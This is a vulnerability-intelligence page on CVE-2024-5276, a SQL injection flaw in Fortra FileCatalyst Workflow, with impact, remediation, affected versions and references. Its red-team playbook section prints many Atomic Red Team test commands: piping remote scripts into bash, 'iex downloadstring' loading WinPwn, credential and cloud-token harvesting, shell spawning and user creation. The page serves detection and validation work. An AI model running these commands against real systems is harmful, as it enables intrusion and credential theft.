CVE-2024-5276
Overview
This vulnerability is a SQL Injection flaw rooted in improper input validation within Fortra FileCatalyst Workflow's database query construction. The affected component fails to sanitize user-supplied input before incorporating it into SQL statements, enabling injection of malicious SQL code. The flaw resides in the Workflow system's handling of requests, particularly when anonymous access is enabled or when an authenticated user interacts with vulnerable endpoints.
Vulnerability Description
A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
Impact
An attacker can exploit this vulnerability to create administrative users and modify or delete data within the application database, potentially compromising the integrity of the Workflow system. Exploitation requires either anonymous access enabled (no authentication needed) or valid user credentials, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N. The ability to alter application data can disrupt business operations and lead to unauthorized administrative control, affecting trust and availability of the system.
Solution
Fortra has released security advisories FI-2024-008 and a knowledge base article (Advisory 6-24-2024) detailing remediation steps. Users should upgrade FileCatalyst Workflow to versions later than 5.1.6 Build 135 where this SQL Injection vulnerability is addressed. The vendor recommends disabling anonymous access if not required and applying the latest patches as outlined in the official Fortra advisories available at https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0 and https://www.fortra.com/security/advisory/fi-2024-008.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified within Fortra FileCatalyst Workflow, characterized by SQL injection capabilities that allow unauthorized modification of application data. This flaw arises from insufficient input validation, enabling attackers to manipulate SQL queries executed by the application. Specifically, the vulnerability permits the creation of administrative users, as well as the deletion or alteration of existing data within the application database. Notably, while data exfiltration through SQL injection is not feasible in this scenario, the potential for unauthorized data manipulation poses significant risks to the integrity and confidentiality of the system.
Exploitation of this vulnerability can occur through multiple attack vectors, with the most concerning being the ability to exploit the system without authentication, provided that anonymous access is enabled. In environments where anonymous access is not permitted, an authenticated user may still be able to exploit the vulnerability, albeit with additional barriers. Attackers could leverage this weakness to gain elevated privileges, allowing them to create new administrative accounts or modify critical application data. This could lead to a complete compromise of the application's functionality and security posture, making it a prime target for malicious actors seeking to disrupt operations or manipulate data for nefarious purposes.
The real-world implications of this vulnerability are profound, particularly for organizations that rely on FileCatalyst Workflow for managing sensitive data and workflows. The ability to create administrative users could lead to unauthorized access to critical systems, potentially resulting in data breaches or loss of data integrity. Furthermore, the manipulation of application data can have cascading effects on business operations, including financial losses, reputational damage, and regulatory non-compliance. Organizations may face legal repercussions if sensitive customer data is compromised or if they fail to protect their systems adequately. The high CVSS score of 9.1 underscores the severity of the risk, indicating that immediate attention is warranted.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and vulnerability scans can help identify instances of the affected FileCatalyst Workflow versions within the environment. Additionally, organizations should review their access control configurations, ensuring that anonymous access is disabled unless absolutely necessary. Employing web application firewalls (WAFs) can also provide an additional layer of protection by filtering out malicious SQL injection attempts. Furthermore, organizations should prioritize applying patches and updates provided by Fortra to remediate the vulnerability in their systems. Continuous monitoring and logging of application activity can aid in detecting anomalous behavior that may indicate exploitation attempts.
In conclusion, the SQL injection vulnerability in Fortra FileCatalyst Workflow presents a significant threat to organizations that utilize this application. The potential for unauthorized data manipulation and administrative access can lead to severe operational and reputational consequences. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this critical security flaw. Prioritizing security measures and staying informed about vulnerabilities is essential for maintaining the integrity and confidentiality of sensitive data in today's increasingly complex threat landscape.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortra | Filecatalyst Workflow | All |
cpe:2.3:a:fortra:filecatalyst_workflow:*:*:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:-:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:build112:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:build114:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:build126:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:build130:*:*:*:*:*:*
|
|
|
Fortra | Filecatalyst Workflow | 5.1.6 |
cpe:2.3:a:fortra:filecatalyst_workflow:5.1.6:build135:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
auxiliary/admin/http/fortra_filecatalyst_workflow_sqli
|
Tenable, Michael Heinzl | Unknown | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-5276 |
| support.fortra.com |
GitHub CVE
|
https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0 |
| fortra.com |
GitHub CVE
|
https://www.fortra.com/security/advisory/fi-2024-008 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2024-25 |